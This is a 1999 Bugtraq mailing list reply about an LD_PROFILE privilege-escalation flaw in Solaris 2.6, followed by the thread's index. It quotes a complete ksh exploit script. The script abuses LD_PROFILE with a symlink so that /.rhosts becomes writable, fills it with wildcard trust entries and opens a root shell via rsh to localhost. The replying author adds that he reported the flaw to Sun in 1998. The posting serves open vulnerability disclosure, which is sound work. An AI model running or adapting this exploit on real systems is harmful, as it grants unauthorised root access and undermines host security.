Bugtraq mailing list archives
Re: LD_PROFILE local root exploit for solaris 2.6
From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Sat, 25 Sep 1999 02:25:52 +0200
On Wed, 22 Sep 1999, Steve Mynott wrote:
works on solaris 2.6 sparc anyway... #! /bin/ksh # LD_PROFILE local root exploit for solaris # steve () tightrope demon co uk 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i
Old news. I discovered this problem and informed Sun about it in June 1998. I cannot verify it right now but I think they have already made a patch for it. GNU libc 2.something used to be affected as well. The odds are other platforms having this particular nifty feature (if they exist at all) are still vulnerable because I forgot to told Bugtraq about it. Oh, mea culpa! :) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation."
Current thread:
- Vulnerability in dtaction on Digital Unix, (continued)
- Vulnerability in dtaction on Digital Unix Zack Hubert (Sep 16)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Nmap and Cisco Dos, clarification -- Lancashire, Andrew (Sep 22)
- Re: Nmap and Cisco Dos, clarification -- Darren Reed (Sep 23)
- LD_PROFILE local root exploit for solaris 2.6 Steve Mynott (Sep 22)
- Re: LD_PROFILE local root exploit for solaris 2.6 Brock Sides (Sep 23)
- Re: LD_PROFILE local root exploit for solaris 2.6 Erik Fichtner (Sep 23)
- Announcing Second Annual TooRcon Computer Security Expo Ben (Sep 25)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Re: LD_PROFILE local root exploit for solaris 2.6 Casper Dik (Sep 24)
- Re: LD_PROFILE local root exploit for solaris 2.6 Eric Daniel (Sep 28)
- Vulnerability in dtaction on Digital Unix Zack Hubert (Sep 16)
- Re: LD_PROFILE local root exploit for solaris 2.6 Pavel Kankovsky (Sep 24)
- Re: Vulnerability in dtaction on Digital Unix Dave Dittrich (Sep 22)
- Re: ASUS mother board security question... Alan Cox (Sep 16)
- Re: ASUS mother board security question... Nick FitzGerald (Sep 25)